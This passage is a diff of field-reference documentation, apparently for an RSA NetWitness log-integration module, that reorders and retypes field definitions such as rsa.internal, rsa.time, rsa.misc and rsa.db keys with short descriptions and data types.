-Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.nwe_callback_id`*:: +*`rsa.misc.cache`*:: + -- -This key denotes that event is endpoint related - type: keyword -- -*`rsa.internal.parse_error`*:: +*`rsa.misc.cache_hit`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.payload_req`*:: +*`rsa.misc.cefversion`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.payload_res`*:: +*`rsa.misc.cfg_attr`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.process_vid_dst`*:: +*`rsa.misc.cfg_obj`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - type: keyword -- -*`rsa.internal.process_vid_src`*:: +*`rsa.misc.cfg_path`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - type: keyword -- -*`rsa.internal.rid`*:: +*`rsa.misc.changes`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.session_split`*:: +*`rsa.misc.client_ip`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.site`*:: +*`rsa.misc.clustermembers`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.size`*:: +*`rsa.misc.cn_acttimeout`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.sourcefile`*:: +*`rsa.misc.cn_asn_src`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.ubc_req`*:: +*`rsa.misc.cn_bgpv4nxthop`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.ubc_res`*:: +*`rsa.misc.cn_ctr_dst_code`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.word`*:: +*`rsa.misc.cn_dst_tos`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`rsa.misc.cn_dst_vlan`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: keyword -- -*`rsa.time.duration_time`*:: +*`rsa.misc.cn_engine_id`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`rsa.misc.cn_engine_type`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`rsa.misc.cn_f_switch`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: +*`rsa.misc.cn_flowsampid`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`rsa.misc.cn_flowsampintv`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: +*`rsa.misc.cn_flowsampmode`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`rsa.misc.cn_inacttimeout`*:: + -- -This key is used to capture the timezone of the Event Time - type: keyword -- -*`rsa.time.duration_str`*:: +*`rsa.misc.cn_inpermbyts`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`rsa.misc.cn_inpermpckts`*:: + -- type: keyword -- -*`rsa.time.year`*:: +*`rsa.misc.cn_invalid`*:: + -- type: keyword -- -*`rsa.time.recorded_time`*:: +*`rsa.misc.cn_ip_proto_ver`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`rsa.misc.cn_ipv4_ident`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`rsa.misc.cn_l_switch`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: keyword -- -*`rsa.time.expire_time`*:: +*`rsa.misc.cn_log_did`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: keyword -- -*`rsa.time.process_time`*:: +*`rsa.misc.cn_log_rid`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`rsa.misc.cn_max_ttl`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`rsa.misc.cn_maxpcktlen`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`rsa.misc.cn_min_ttl`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`rsa.misc.cn_minpcktlen`*:: + -- -This key is the Time that the event was queued. - -type: date +type: keyword -- -*`rsa.time.p_time1`*:: +*`rsa.misc.cn_mpls_lbl_1`*:: + -- type: keyword -- -*`rsa.time.tzone`*:: +*`rsa.misc.cn_mpls_lbl_10`*:: + -- type: keyword -- -*`rsa.time.eventtime`*:: +*`rsa.misc.cn_mpls_lbl_2`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`rsa.misc.cn_mpls_lbl_3`*:: + -- type: keyword -- -*`rsa.time.gmttime`*:: +*`rsa.misc.cn_mpls_lbl_4`*:: + -- type: keyword -- -*`rsa.time.p_date`*:: +*`rsa.misc.cn_mpls_lbl_5`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`rsa.misc.cn_mpls_lbl_6`*:: + -- type: keyword -- -*`rsa.time.p_time`*:: +*`rsa.misc.cn_mpls_lbl_7`*:: + -- type: keyword -- -*`rsa.time.p_time2`*:: +*`rsa.misc.cn_mpls_lbl_8`*:: + -- type: keyword -- -*`rsa.time.p_year`*:: +*`rsa.misc.cn_mpls_lbl_9`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`rsa.misc.cn_mplstoplabel`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - type: keyword -- -*`rsa.time.stamp`*:: +*`rsa.misc.cn_mplstoplabip`*:: + -- -Deprecated key defined only in table map. - -type: date +type: keyword -- - -*`rsa.misc.action`*:: +*`rsa.misc.cn_mul_dst_byt`*:: + -- type: keyword -- -*`rsa.misc.result`*:: +*`rsa.misc.cn_mul_dst_pks`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - type: keyword -- -*`rsa.misc.severity`*:: +*`rsa.misc.cn_muligmptype`*:: + -- -This key is used to capture the severity given the session - type: keyword -- -*`rsa.misc.event_type`*:: +*`rsa.misc.cn_sampalgo`*:: + -- -This key captures the event category type as specified by the event source. - type: keyword -- -*`rsa.misc.reference_id`*:: +*`rsa.misc.cn_sampint`*:: + -- -This key is used to capture an event id from the session directly - type: keyword -- -*`rsa.misc.version`*:: +*`rsa.misc.cn_seqctr`*:: + -- -This key captures Version of the application or OS which is generating the event. - type: keyword -- -*`rsa.misc.disposition`*:: +*`rsa.misc.cn_spackets`*:: + -- -This key captures the The end state of an action. - type: keyword -- -*`rsa.misc.result_code`*:: +*`rsa.misc.cn_src_tos`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - type: keyword -- -*`rsa.misc.category`*:: +*`rsa.misc.cn_src_vlan`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - type: keyword -- -*`rsa.misc.obj_name`*:: +*`rsa.misc.cn_sysuptime`*:: + -- -This is used to capture name of object - type: keyword -- -*`rsa.misc.obj_type`*:: +*`rsa.misc.cn_template_id`*:: + -- -This is used to capture type of object - type: keyword -- -*`rsa.misc.event_source`*:: +*`rsa.misc.cn_totbytsexp`*:: + -- -This key captures Source of the event that’s not a hostname - type: keyword -- -*`rsa.misc.log_session_id`*:: +*`rsa.misc.cn_totflowexp`*:: + -- -This key is used to capture a sessionid from the session directly - type: keyword -- -*`rsa.misc.group`*:: +*`rsa.misc.cn_totpcktsexp`*:: + -- -This key captures the Group Name value - type: keyword -- -*`rsa.misc.policy_name`*:: +*`rsa.misc.cn_unixnanosecs`*:: + -- -This key is used to capture the Policy Name only. - type: keyword -- -*`rsa.misc.rule_name`*:: +*`rsa.misc.cn_v6flowlabel`*:: + -- -This key captures the Rule Name - type: keyword -- -*`rsa.misc.context`*:: +*`rsa.misc.cn_v6optheaders`*:: + -- -This key captures Information which adds additional context to the event. - type: keyword -- -*`rsa.misc.change_new`*:: +*`rsa.misc.comp_class`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.space`*:: +*`rsa.misc.comp_name`*:: + -- type: keyword -- -*`rsa.misc.client`*:: +*`rsa.misc.comp_rbytes`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - type: keyword -- -*`rsa.misc.msgIdPart1`*:: +*`rsa.misc.comp_sbytes`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart2`*:: +*`rsa.misc.cpu_data`*:: + -- type: keyword -- -*`rsa.misc.change_old`*:: +*`rsa.misc.criticality`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.operation_id`*:: +*`rsa.misc.cs_agency_dst`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - type: keyword -- -*`rsa.misc.event_state`*:: +*`rsa.misc.cs_analyzedby`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - type: keyword -- -*`rsa.misc.group_object`*:: +*`rsa.misc.cs_av_other`*:: + -- -This key captures a collection/grouping of entities. Specific usage - type: keyword -- -*`rsa.misc.node`*:: +*`rsa.misc.cs_av_primary`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - type: keyword -- -*`rsa.misc.rule`*:: +*`rsa.misc.cs_av_secondary`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`rsa.misc.cs_bgpv6nxthop`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - type: keyword -- -*`rsa.misc.param`*:: +*`rsa.misc.cs_bit9status`*:: + -- -This key is the parameters passed as part of a command or application, etc. - type: keyword -- -*`rsa.misc.change_attrib`*:: +*`rsa.misc.cs_context`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.event_computer`*:: +*`rsa.misc.cs_control`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - type: keyword -- -*`rsa.misc.reference_id1`*:: +*`rsa.misc.cs_data`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - type: keyword -- -*`rsa.misc.event_log`*:: +*`rsa.misc.cs_datecret`*:: + -- -This key captures the Name of the event log - type: keyword -- -*`rsa.misc.OS`*:: +*`rsa.misc.cs_dst_tld`*:: + -- -This key captures the Name of the Operating System - type: keyword -- -*`rsa.misc.terminal`*:: +*`rsa.misc.cs_eth_dst_ven`*:: + -- -This key captures the Terminal Names only - type: keyword -- -*`rsa.misc.msgIdPart3`*:: +*`rsa.misc.cs_eth_src_ven`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`rsa.misc.cs_event_uuid`*:: + -- -This key captures Filter used to reduce result set - type: keyword -- -*`rsa.misc.serial_number`*:: +*`rsa.misc.cs_filetype`*:: + -- -This key is the Serial number associated with a physical asset. - type: keyword -- -*`rsa.misc.checksum`*:: +*`rsa.misc.cs_fld`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - type: keyword -- -*`rsa.misc.event_user`*:: +*`rsa.misc.cs_if_desc`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. - type: keyword -- -*`rsa.misc.virusname`*:: +*`rsa.misc.cs_if_name`*:: + -- -This key captures the name of the virus - type: keyword -- -*`rsa.misc.content_type`*:: +*`rsa.misc.cs_ip_next_hop`*:: + -- -This key is used to capture Content Type only. - type: keyword -- -*`rsa.misc.group_id`*:: +*`rsa.misc.cs_ipv4dstpre`*:: + -- -This key captures Group ID Number (related to the group name) - type: keyword -- -*`rsa.misc.policy_id`*:: +*`rsa.misc.cs_ipv4srcpre`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - type: keyword -- -*`rsa.misc.vsys`*:: +*`rsa.misc.cs_lifetime`*:: + -- -This key captures Virtual System Name - type: keyword -- -*`rsa.misc.connection_id`*:: +*`rsa.misc.cs_log_medium`*:: + -- -This key captures the Connection ID - type: keyword -- -*`rsa.misc.reference_id2`*:: +*`rsa.misc.cs_loginname`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - type: keyword -- -*`rsa.misc.sensor`*:: +*`rsa.misc.cs_modulescore`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - type: keyword -- -*`rsa.misc.sig_id`*:: +*`rsa.misc.cs_modulesign`*:: + -- -This key captures IDS/IPS Int Signature ID - -type: long +type: keyword -- -*`rsa.misc.port_name`*:: +*`rsa.misc.cs_opswatresult`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`rsa.misc.cs_payload`*:: + -- -This key captures the Rule group name - type: keyword -- -*`rsa.misc.risk_num`*:: +*`rsa.misc.cs_registrant`*:: + -- -This key captures a Numeric Risk value - -type: double +type: keyword -- -*`rsa.misc.trigger_val`*:: +*`rsa.misc.cs_registrar`*:: + -- -This key captures the Value of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.log_session_id1`*:: +*`rsa.misc.cs_represult`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - type: keyword -- -*`rsa.misc.comp_version`*:: +*`rsa.misc.cs_rpayload`*:: + -- -This key captures the Version level of a sub-component of a product. - type: keyword -- -*`rsa.misc.content_version`*:: +*`rsa.misc.cs_sampler_name`*:: + -- -This key captures Version level of a signature or database content. - type: keyword -- -*`rsa.misc.hardware_id`*:: +*`rsa.misc.cs_sourcemodule`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - type: keyword -- -*`rsa.misc.risk`*:: +*`rsa.misc.cs_streams`*:: + -- -This key captures the non-numeric risk value - type: keyword -- -*`rsa.misc.event_id`*:: +*`rsa.misc.cs_targetmodule`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`rsa.misc.cs_v6nxthop`*:: + -- type: keyword -- -*`rsa.misc.status`*:: +*`rsa.misc.cs_whois_server`*:: + -- type: keyword -- -*`rsa.misc.mail_id`*:: +*`rsa.misc.cs_yararesult`*:: + -- -This key is used to capture the mailbox id/name - type: keyword -- -*`rsa.misc.rule_uid`*:: +*`rsa.misc.description`*:: + -- -This key is the Unique Identifier for a rule. - type: keyword -- -*`rsa.misc.trigger_desc`*:: +*`rsa.misc.devvendor`*:: + -- -This key captures the Description of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.inout`*:: +*`rsa.misc.distance`*:: + -- type: keyword -- -*`rsa.misc.p_msgid`*:: +*`rsa.misc.dstburb`*:: + -- type: keyword -- -*`rsa.misc.data_type`*:: +*`rsa.misc.edomain`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart4`*:: +*`rsa.misc.edomaub`*:: + -- type: keyword -- -*`rsa.misc.error`*:: +*`rsa.misc.euid`*:: + -- -This key captures All non successful Error codes or responses - type: keyword -- -*`rsa.misc.index`*:: +*`rsa.misc.facility`*:: + -- type: keyword -- -*`rsa.misc.listnum`*:: +*`rsa.misc.finterface`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - type: keyword -- -*`rsa.misc.ntype`*:: +*`rsa.misc.flags`*:: + -- type: keyword -- -*`rsa.misc.observed_val`*:: +*`rsa.misc.gaddr`*:: + -- -This key captures the Value observed (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.policy_value`*:: +*`rsa.misc.id3`*:: + -- -This key captures the contents of the policy. This contains details about the policy - type: keyword -- -*`rsa.misc.pool_name`*:: +*`rsa.misc.im_buddyname`*:: + -- -This key captures the name of a resource pool - type: keyword -- -*`rsa.misc.rule_template`*:: +*`rsa.misc.im_croomid`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template - type: keyword -- -*`rsa.misc.count`*:: +*`rsa.misc.im_croomtype`*:: + -- type: keyword -- -*`rsa.misc.number`*:: +*`rsa.misc.im_members`*:: + -- type: keyword -- -*`rsa.misc.sigcat`*:: +*`rsa.misc.im_username`*:: + -- type: keyword -- -*`rsa.misc.type`*:: +*`rsa.misc.ipkt`*:: + -- type: keyword -- -*`rsa.misc.comments`*:: +*`rsa.misc.ipscat`*:: + -- -Comment information provided in the log message - type: keyword -- -*`rsa.misc.doc_number`*:: +*`rsa.misc.ipspri`*:: + -- -This key captures File Identification number - -type: long +type: keyword -- -*`rsa.misc.expected_val`*:: +*`rsa.misc.latitude`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.job_num`*:: +*`rsa.misc.linenum`*:: + -- -This key captures the Job Number - type: keyword -- -*`rsa.misc.spi_dst`*:: +*`rsa.misc.list_name`*:: + -- -Destination SPI Index - type: keyword -- -*`rsa.misc.spi_src`*:: +*`rsa.misc.load_data`*:: + -- -Source SPI Index - type: keyword -- -*`rsa.misc.code`*:: +*`rsa.misc.location_floor`*:: + -- type: keyword -- -*`rsa.misc.agent_id`*:: +*`rsa.misc.location_mark`*:: + -- -This key is used to capture agent id - type: keyword -- -*`rsa.misc.message_body`*:: +*`rsa.misc.log_id`*:: + -- -This key captures the The contents of the message body. - type: keyword -- -*`rsa.misc.phone`*:: +*`rsa.misc.log_type`*:: + -- type: keyword -- -*`rsa.misc.sig_id_str`*:: +*`rsa.misc.logid`*:: + -- -This key captures a string object of the sigid variable. - type: keyword -- -*`rsa.misc.cmd`*:: +*`rsa.misc.logip`*:: + -- type: keyword -- -*`rsa.misc.misc`*:: +*`rsa.misc.logname`*:: + -- type: keyword -- -*`rsa.misc.name`*:: +*`rsa.misc.longitude`*:: + -- type: keyword -- -*`rsa.misc.cpu`*:: +*`rsa.misc.lport`*:: + -- -This key is the CPU time used in the execution of the event being recorded. - -type: long +type: keyword -- -*`rsa.misc.event_desc`*:: +*`rsa.misc.mbug_data`*:: + -- -This key is used to capture a description of an event available directly or inferred - type: keyword -- -*`rsa.misc.sig_id1`*:: +*`rsa.misc.misc_name`*:: + -- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id - -type: long +type: keyword -- -*`rsa.misc.im_buddyid`*:: +*`rsa.misc.msg_type`*:: + -- type: keyword -- -*`rsa.misc.im_client`*:: +*`rsa.misc.msgid`*:: + -- type: keyword -- -*`rsa.misc.im_userid`*:: +*`rsa.misc.netsessid`*:: + -- type: keyword -- -*`rsa.misc.pid`*:: +*`rsa.misc.num`*:: + -- type: keyword -- -*`rsa.misc.priority`*:: +*`rsa.misc.number1`*:: + -- type: keyword -- -*`rsa.misc.context_subject`*:: +*`rsa.misc.number2`*:: + -- -This key is to be used in an audit context where the subject is the object being identified - type: keyword -- -*`rsa.misc.context_target`*:: +*`rsa.misc.nwwn`*:: + -- type: keyword -- -*`rsa.misc.cve`*:: +*`rsa.misc.object`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. - type: keyword -- -*`rsa.misc.fcatnum`*:: +*`rsa.misc.operation`*:: + -- -This key captures Filter Category Number. Legacy Usage - type: keyword -- -*`rsa.misc.library`*:: +*`rsa.misc.opkt`*:: + -- -This key is used to capture library information in mainframe devices - type: keyword -- -*`rsa.misc.parent_node`*:: +*`rsa.misc.orig_from`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - type: keyword -- -*`rsa.misc.risk_info`*:: +*`rsa.misc.owner_id`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`rsa.misc.p_action`*:: + -- -This key is captures the TCP flags set in any packet of session - -type: long +type: keyword -- -*`rsa.misc.tos`*:: +*`rsa.misc.p_filter`*:: + -- -This key describes the type of service - -type: long +type: keyword -- -*`rsa.misc.vm_target`*:: +*`rsa.misc.p_group_object`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`rsa.misc.p_id`*:: + -- -This key captures Workspace Description - type: keyword -- -*`rsa.misc.command`*:: +*`rsa.misc.p_msgid1`*:: + -- type: keyword -- -*`rsa.misc.event_category`*:: +*`rsa.misc.p_msgid2`*:: + -- type: keyword -- -*`rsa.misc.facilityname`*:: +*`rsa.misc.p_result1`*:: + -- type: keyword -- -*`rsa.misc.forensic_info`*:: +*`rsa.misc.password_chg`*:: + -- type: keyword -- -*`rsa.misc.jobname`*:: +*`rsa.misc.password_expire`*:: + -- type: keyword -- -*`rsa.misc.mode`*:: +*`rsa.misc.permgranted`*:: + -- type: keyword -- -*`rsa.misc.policy`*:: +*`rsa.misc.permwanted`*:: + -- type: keyword -- -*`rsa.misc.policy_waiver`*:: +*`rsa.misc.pgid`*:: + -- type: keyword -- -*`rsa.misc.second`*:: +*`rsa.misc.policyUUID`*:: + -- type: keyword -- -*`rsa.misc.space1`*:: +*`rsa.misc.prog_asp_num`*:: + -- type: keyword -- -*`rsa.misc.subcategory`*:: +*`rsa.misc.program`*:: + -- type: keyword -- -*`rsa.misc.tbdstr2`*:: +*`rsa.misc.real_data`*:: + -- type: keyword -- -*`rsa.misc.alert_id`*:: +*`rsa.misc.rec_asp_device`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`rsa.misc.rec_asp_num`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`rsa.misc.rec_library`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - type: keyword -- -*`rsa.misc.fresult`*:: +*`rsa.misc.recordnum`*:: + -- -This key captures the Filter Result - -type: long +type: keyword -- -*`rsa.misc.payload_dst`*:: +*`rsa.misc.ruid`*:: + -- -This key is used to capture destination payload - type: keyword -- -*`rsa.misc.payload_src`*:: +*`rsa.misc.sburb`*:: + -- -This key is used to capture source payload - type: keyword -- -*`rsa.misc.pool_id`*:: +*`rsa.misc.sdomain_fld`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - type: keyword -- -*`rsa.misc.process_id_val`*:: +*`rsa.misc.sec`*:: + -- -This key is a failure key for Process ID when it is not an integer value - type: keyword -- -*`rsa.misc.risk_num_comm`*:: +*`rsa.misc.sensorname`*:: + -- -This key captures Risk Number Community - -type: double +type: keyword -- -*`rsa.misc.risk_num_next`*:: +*`rsa.misc.seqnum`*:: + -- -This key captures Risk Number NextGen - -type: double +type: keyword -- -*`rsa.misc.risk_num_sand`*:: +*`rsa.misc.session`*:: + -- -This key captures Risk Number SandBox - -type: double +type: keyword -- -*`rsa.misc.risk_num_static`*:: +*`rsa.misc.sessiontype`*:: + -- -This key captures Risk Number Static - -type: double +type: keyword -- -*`rsa.misc.risk_suspicious`*:: +*`rsa.misc.sigUUID`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.risk_warning`*:: +*`rsa.misc.spi`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.snmp_oid`*:: +*`rsa.misc.srcburb`*:: + -- -SNMP Object Identifier - type: keyword -- -*`rsa.misc.sql`*:: +*`rsa.misc.srcdom`*:: + -- -This key captures the SQL query - type: keyword -- -*`rsa.misc.vuln_ref`*:: +*`rsa.misc.srcservice`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`rsa.misc.state`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`rsa.misc.status1`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`rsa.misc.svcno`*:: + -- type: keyword -- -*`rsa.misc.acl_table`*:: +*`rsa.misc.system`*:: + -- type: keyword -- -*`rsa.misc.admin`*:: +*`rsa.misc.tbdstr1`*:: + -- type: keyword -- -*`rsa.misc.alarm_id`*:: +*`rsa.misc.tgtdom`*:: + -- type: keyword -- -*`rsa.misc.alarmname`*:: +*`rsa.misc.tgtdomain`*:: + -- type: keyword -- -*`rsa.misc.app_id`*:: +*`rsa.misc.threshold`*:: + -- type: keyword -- -*`rsa.misc.audit`*:: +*`rsa.misc.type1`*:: + -- type: keyword -- -*`rsa.misc.audit_object`*:: +*`rsa.misc.udb_class`*:: + -- type: keyword -- -*`rsa.misc.auditdata`*:: +*`rsa.misc.url_fld`*:: + -- type: keyword -- -*`rsa.misc.benchmark`*:: +*`rsa.misc.user_div`*:: + -- type: keyword -- -*`rsa.misc.bypass`*:: +*`rsa.misc.userid`*:: + -- type: keyword -- -*`rsa.misc.cache`*:: +*`rsa.misc.username_fld`*:: + -- type: keyword -- -*`rsa.misc.cache_hit`*:: +*`rsa.misc.utcstamp`*:: + -- type: keyword -- -*`rsa.misc.cefversion`*:: +*`rsa.misc.v_instafname`*:: + -- type: keyword -- -*`rsa.misc.cfg_attr`*:: +*`rsa.misc.virt_data`*:: + -- type: keyword -- -*`rsa.misc.cfg_obj`*:: +*`rsa.misc.vpnid`*:: + -- type: keyword -- -*`rsa.misc.cfg_path`*:: +*`rsa.misc.autorun_type`*:: + -- +This is used to capture Auto Run type + type: keyword -- -*`rsa.misc.changes`*:: +*`rsa.misc.cc_number`*:: + -- -type: keyword +Valid Credit Card Numbers only + +type: long -- -*`rsa.misc.client_ip`*:: +*`rsa.misc.content`*:: + -- +This key captures the content type from protocol headers + type: keyword -- -*`rsa.misc.clustermembers`*:: +*`rsa.misc.ein_number`*:: + -- -type: keyword +Employee Identification Numbers only + +type: long -- -*`rsa.misc.cn_acttimeout`*:: +*`rsa.misc.found`*:: + -- +This is used to capture the results of regex match + type: keyword -- -*`rsa.misc.cn_asn_src`*:: +*`rsa.misc.language`*:: + -- +This is used to capture list of languages the client support and what it prefers + type: keyword -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`rsa.misc.lifetime`*:: + -- -type: keyword +This key is used to capture the session lifetime in seconds. + +type: long -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`rsa.misc.link`*:: + -- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.misc.cn_dst_tos`*:: +*`rsa.misc.match`*:: + -- +This key is for regex match name from search.ini + type: keyword -- -*`rsa.misc.cn_dst_vlan`*:: +*`rsa.misc.param_dst`*:: + -- +This key captures the command line/launch argument of the target process or file + type: keyword -- -*`rsa.misc.cn_engine_id`*:: +*`rsa.misc.param_src`*:: + -- +This key captures source parameter + type: keyword -- -*`rsa.misc.cn_engine_type`*:: +*`rsa.misc.search_text`*:: + -- +This key captures the Search Text used + type: keyword -- -*`rsa.misc.cn_f_switch`*:: +*`rsa.misc.sig_name`*:: + -- +This key is used to capture the Signature Name only. + type: keyword -- -*`rsa.misc.cn_flowsampid`*:: +*`rsa.misc.snmp_value`*:: + -- +SNMP set request value + type: keyword -- -*`rsa.misc.cn_flowsampintv`*:: +*`rsa.misc.streams`*:: + -- -type: keyword +This key captures number of streams in session + +type: long -- -*`rsa.misc.cn_flowsampmode`*:: + +*`rsa.db.index`*:: + -- +This key captures IndexID of the index. + type: keyword -- -*`rsa.misc.cn_inacttimeout`*:: +*`rsa.db.instance`*:: + -- +This key is used to capture the database server instance name + type: keyword -- -*`rsa.misc.cn_inpermbyts`*:: +*`rsa.db.database`*:: + -- +This key is used to capture the name of a database or an instance as seen in a session + type: keyword -- -*`rsa.misc.cn_inpermpckts`*:: +*`rsa.db.transact_id`*:: + -- +This key captures the SQL transantion ID of the current session + type: keyword -- -*`rsa.misc.cn_invalid`*:: +*`rsa.db.permissions`*:: + -- +This key captures permission or privilege level assigned to a resource. + type: keyword -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`rsa.db.table_name`*:: + -- +This key is used to capture the table name + type: keyword -- -*`rsa.misc.cn_ipv4_ident`*:: +*`rsa.db.db_id`*:: + -- +This key is used to capture the unique identifier for a database + type: keyword -- -*`rsa.misc.cn_l_switch`*:: +*`rsa.db.db_pid`*:: + -- -type: keyword +This key captures the process id of a connection with database server + +type: long -- -*`rsa.misc.cn_log_did`*:: +*`rsa.db.lread`*:: + -- -type: keyword +This key is used for the number of logical reads + +type: long -- -*`rsa.misc.cn_log_rid`*:: +*`rsa.db.lwrite`*:: + -- -type: keyword +This key is used for the number of logical writes + +type: long -- -*`rsa.misc.cn_max_ttl`*:: +*`rsa.db.pread`*:: + -- -type: keyword +This key is used for the number of physical writes + +type: long -- -*`rsa.misc.cn_maxpcktlen`*:: + +*`rsa.network.alias_host`*:: + -- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that 